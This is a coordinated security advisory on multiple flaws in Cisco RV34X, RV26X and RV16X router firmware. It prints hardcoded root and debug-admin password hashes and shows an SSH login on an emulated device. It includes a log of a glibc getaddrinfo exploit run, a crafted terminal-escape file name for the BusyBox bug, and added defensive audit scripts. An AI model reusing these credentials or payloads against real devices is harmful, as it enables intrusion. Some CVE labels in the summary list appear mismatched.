Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X

Project Description

The Cisco router series RV34X, RV26X and RV16X are affected by multiple vulnerabilities resulting from old software components embedded in the firmware. Hardcoded password hashes and credentials were also found by an automated scan with IoT Inspector. According to Cisco, however, these hashes cannot be used for real interactions with the device. Two vulnerabilities (CVE-2015-7547 and CVE-2017-16544) were verified by emulating the device with the MEDUSA scalable firmware runtime.


Vendor description

“Securely connecting your small business to the outside world is as important as connecting your internal network devices to one another. Cisco Small Business RV Series Routers offer virtual private networking (VPN) technology so your remote workers can connect to your network through a secure Internet pathway.”

Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html 

Business recommendation

SEC Consult wants to thank Cisco for the very quick and professional response and great coordination. Customers are urged to update the firmware of their devices.

 

Vulnerability overview/description

1) Hardcoded Credentials

The device contains hardcoded users and passwords which can be used to log in via SSH, at least on an emulated device. During the communication with Cisco it turned out that: “Accounts like the ‘debug-admin’ and ‘root’ can not be accessed from console port, CLI or webui”. Therefore, these accounts had no real functionality and cannot be used for malicious actions.

2) Known GNU glibc Vulnerabilities

The firmware uses GNU glibc version 2.19, which is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2015-7547, “getaddrinfo() buffer overflow”) was verified by using the MEDUSA scalable firmware runtime.

3) Known BusyBox Vulnerabilities

The firmware uses the BusyBox toolkit in version 1.23.2, which is outdated and contains multiple known vulnerabilities. The outdated version was found by IoT Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA scalable firmware runtime.

4) Multiple Vulnerabilities – IoT Inspector Report

Further information can be found in IoT Inspector Report: https://r.sec-consult.com/ciscoiot

Proof of concept

1) Hardcoded Credentials

The following hardcoded hashes were found in the ‘shadow’ file of the firmware:

root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:99999:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:99999:7:::
[...]

The undocumented user ‘debug-admin’ is also contained in this file. Starting the dropbear daemon as a background process on the emulated firmware:

# dropbear -E
# [1109]  Running in background
#
# [1112]  Child connection from :52718
[1112]  /var must be owned by user or root, and not writable by others
[1112]  Password auth succeeded for 'debug-admin' from :52718

Log on via another host connected to the same network. For this PoC the password of the debug-admin was changed in the ‘shadow’ file.

[root@localhost medusa]# ssh debug-admin@ /bin/ash -i
debug-admin@'s password: 
/bin/ash: can't access tty; job control turned off

BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

/tmp $

The ‘debug-admin’ user has the same privileges as ‘root’. This can be determined from the corresponding sudoers file in the firmware:

[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]

During the communication with Cisco it turned out that: “Accounts like the ‘debug-admin’ and ‘root’ can not be accessed from console port, CLI or webui”. Therefore, these accounts had no real functionality and cannot be used for malicious actions.
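The same shadow/sudoers cross-check can be run against any unpacked firmware root file system before deployment. The following Python audit is an added example, not part of the original advisory or of IoT Inspector; the function names, the list of documented accounts and the sample file contents (with placeholder hash values) are assumptions made for illustration.

```python
import re

# crypt(3) scheme ids as they appear in the shadow password field
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
           "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt", "y": "yescrypt"}
WEAK = {"md5crypt", "des-or-unknown", "empty"}   # policy choice of this example
FULL_SUDO = re.compile(r"^\s*([^#%\s]\S*)\s+ALL\s*=\s*\(\s*ALL(?:\s*:\s*ALL)?\s*\)"
                       r"\s*(?:NOPASSWD:\s*)?ALL\s*$")

def parse_shadow(text):
    """Map every account whose password field is not locked to its hash scheme."""
    accounts = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0] or fields[0].startswith("#"):
            continue
        user, pw = fields[0], fields[1]
        if pw.startswith(("!", "*")):          # locked account, no password login
            continue
        m = re.match(r"\$([0-9a-z]+)\$", pw)
        if m:
            accounts[user] = SCHEMES.get(m.group(1), "unknown")
        else:                                  # empty field or no $id$ prefix
            accounts[user] = "des-or-unknown" if pw else "empty"
    return accounts

def parse_sudoers(text):
    """Return users granted 'ALL=(ALL) ALL'; comments and %group rules are skipped."""
    return {m.group(1) for m in map(FULL_SUDO.match, text.splitlines()) if m}

def audit(shadow_text, sudoers_text, documented):
    """One finding per login-capable account, sorted by user name."""
    sudo = parse_sudoers(sudoers_text)
    return [{"user": u, "scheme": s, "weak_hash": s in WEAK,
             "full_sudo": u in sudo, "undocumented": u not in documented}
            for u, s in sorted(parse_shadow(shadow_text).items())]

# Constructed sample modelled on the excerpts above; hash values are placeholders.
SHADOW = """root:$1$EXAMPLE0$placeholderhashvalue00:15533:0:99999:7:::
debug-admin:$1$EXAMPLE1$placeholderhashvalue01:15541:0:99999:7:::
daemon:*:0:0:99999:7:::
nobody:!:0:0:99999:7:::"""
SUDOERS = """## User privilege specification
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL
# %wheel ALL=(ALL) ALL"""

if __name__ == "__main__":
    for finding in audit(SHADOW, SUDOERS, documented={"root"}):
        print(finding)
```

An account that is login-capable, undocumented and has full sudo rights at the same time is the combination worth raising with the vendor, as was done for ‘debug-admin’ here.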

2) Known GNU glibc Vulnerabilities

GNU glibc version 2.19 is affected by multiple CVEs, such as:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472, CVE-2015-5277, CVE-2015-8778, CVE-2015-8779, CVE-2017-1000366 and more.

The getaddrinfo() buffer overflow vulnerability was checked with the help of the exploit code from https://github.com/fjserna/CVE-2015-7547. It was compiled and executed on the emulated device to test the system.

# python cve-2015-7547-poc.py &
[1] 961
# chroot /medusa_rootfs/ bin/ash


BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

# gdb cve-2015-7547_glibc_getaddrinfo 
[...]
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
Connected with 127.0.0.1:41782
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
[TCP] Request2 len recv 36
Cannot access memory at address 0x4

Program received signal SIGSEGV, Segmentation fault.
0x76f1fd58 in ?? () from /lib/libc.so.6
(gdb)

 

References:

3) Known BusyBox Vulnerabilities

BusyBox version 1.23.2 is affected by multiple CVEs, such as: CVE-2016-2148, CVE-2016-6301, CVE-2015-9261, CVE-2016-2147, CVE-2018-20679, CVE-2017-16544 and CVE-2019-5747.
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on an emulated device:

A file with the name \ectest\n\e]55;test.txt\a was created to trigger the vulnerability.

# ls "pressing <TAB>"
test
]55;test.txt  
#
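File names of this kind, which carry terminal control bytes, can be looked for on an unpacked firmware image or a shared directory without printing them raw. The following Python check is an added example, not part of the original advisory; the function names are hypothetical and the test file is created in a temporary directory.

```python
import os
import tempfile

def has_control_bytes(name: bytes) -> bool:
    """True if a file name contains C0 control bytes or DEL (ESC, BEL, newline, ...)."""
    return any(b < 0x20 or b == 0x7F for b in name)

def printable(name: bytes) -> str:
    """Render a name safely for a terminal: non-printable bytes become \\xNN escapes."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in name)

def scan(root: str):
    """Walk root with byte paths and return sorted, safely rendered suspicious names."""
    top = os.fsencode(root)
    hits = []
    for dirpath, dirnames, filenames in os.walk(top):
        for name in dirnames + filenames:
            if has_control_bytes(name):
                rel = os.path.relpath(os.path.join(dirpath, name), top)
                hits.append(printable(rel))
    return sorted(hits)

def demo():
    """Create the file name from the PoC plus a harmless one, then scan the directory."""
    with tempfile.TemporaryDirectory() as tmp:
        crafted = b"\x1bctest\n\x1b]55;test.txt\x07"   # \ectest\n\e]55;test.txt\a
        for name in (crafted, b"readme.txt"):
            open(os.path.join(os.fsencode(tmp), name), "wb").close()
        return scan(tmp)

if __name__ == "__main__":
    for hit in demo():
        print(hit)
```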

4) Multiple Vulnerabilities – IoT Inspector Report

Further information can be found in IoT Inspector report: https://r.sec-consult.com/ciscoiot

The summary is below:

IoT Inspector Vulnerability #1 BusyBox CVE entries
Outdated BusyBox version is affected by 7 published CVEs.

IoT Inspector Vulnerability #2 curl CVE entries
Outdated curl version is affected by 35 published CVEs.

IoT Inspector Vulnerability #3 GNU glibc CVE entries
Outdated GNU glibc version is affected by 44 published CVEs.

IoT Inspector Vulnerability #4 GNU glibc getaddrinfo() buffer overflow
Outdated GNU glibc version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #5 Hardcoded password hashes
Firmware contains multiple hardcoded credentials.

IoT Inspector Vulnerability #6 Linux Kernel CVE entries
Outdated Linux Kernel version affected by 512 published CVEs.

IoT Inspector Vulnerability #7 MiniUPnPd CVE entries
Outdated MiniUPnPd version affected by 2 published CVEs.

IoT Inspector Vulnerability #8 Dnsmasq CVE entries
Outdated MiniUPnPd version affected by 1 published CVE.

IoT Inspector Vulnerability #9 Linux Kernel Privilege Escalation “pp_key”
Outdated Linux Kernel version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #10 OpenSSL CVE entries
Outdated OpenSSL version affected by 6 published CVEs.

Vulnerable / tested versions:

The following firmware versions have been tested with IoT Inspector and firmware emulation techniques:

  • Cisco RV340 / 1.0.02.16
  • Cisco RV340W / 1.0.02.16
  • Cisco RV345 / 1.0.02.16
  • Cisco RV345P / 1.0.02.16

The following firmware versions have been tested with IoT Inspector only:

  • Cisco RV260 / 1.0.00.15
  • Cisco RV260P / 1.0.00.15
  • Cisco RV260W / 1.0.00.15
  • Cisco RV160 / 1.0.00.15
  • Cisco RV160P / 1.0.00.15

The firmware was obtained from the vendor website:

 

Vendor contact timeline

2019-05-15: Contacting vendor through psirt@cisco.com.
2019-05-16: Vendor confirmed the receipt.
2019-05 – 2019-08: Periodic updates about the investigation from the vendor. Clarification of which of the reported issues will be fixed.
2019-08-20: The vendor proposed 2019-09-04 as the next possible publication date for the advisory. The vendor added the RV160 and RV260 router series as also being vulnerable to the same issues.
2019-09-04: Coordinated advisory release.

Solution

Upgrade to the newest available firmware version.

Additionally, the vendor provides the following security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190904-sb-vpnrouter 

Workaround

None.

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF Thomas Weber / @2019

 


Project Details

  • Title: Multiple vulnerabilities
  • Product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P, Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160, Cisco 160W
  • Vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15
  • Fixed version: see Solution
  • CVE number: -
  • Impact: High
  • Homepage: https://www.cisco.com/
  • Found: 2019-05-15
  • By: T. Weber, S. Viehböck (Office Vienna) | SEC Consult Vulnerability Lab
